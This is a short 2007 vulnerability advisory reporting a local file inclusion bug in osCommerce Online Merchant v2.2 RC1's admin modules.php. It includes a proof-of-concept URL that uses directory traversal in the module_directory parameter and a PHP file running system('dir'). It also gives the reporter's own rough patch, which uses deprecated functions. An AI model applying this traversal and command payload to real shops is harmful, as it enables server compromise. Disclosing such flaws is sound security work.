osCommerce Online Merchant v2.2 RC1 local include bug

2007-07-13T00:00:00
ID SECURITYVULNS:DOC:17488
Type securityvulns
Reporter Securityvulns
Modified 2007-07-13T00:00:00

Description

osCommerce Online Merchant v2.2 RC1 local include bug

SEVERITY:

Normal

SOFTWARE:

osCommerce Online Merchant v2.2 RC1

http://oscommerce.com/

INFO:

osCommerce is an Open Source based online shop e-commerce solution that is available for free under the GNU General Public License

DESCRIPTION:

osCommerce has a local inclusion bug in the modules.php file:

http://127.0.0.1/oscommerce-2.2rc1/catalog/admin/modules.php?module_directory=../../../&file=test.php

Where test.php contains:

<?php system("dir"); ?>

VENDOR STATUS:

Vendor was contacted but no response received till date.

MY FIX:

Put:

if(preg_match("/\.\./i", $module_directory)){echo "HACKING attempt !";exit(0);} $module_directory = preg_replace("/[\/]/i","(/)",$module_directory); $module_directory = ereg_replace("[\*]","(\)",$module_directory);

Before:

include(DIR_FS_CATALOG_LANGUAGES . $language . '/modules/' . $module_type . '/' . $file); include($module_directory . $file);

This vulnerability was discovered by matrix_killer

mail : matrix_k at abv.bg

Greets: EcLiPsE, Bl0od3r and Acid_BDS


С бензин в кръвта! http://auto-motor-und-sport.bg/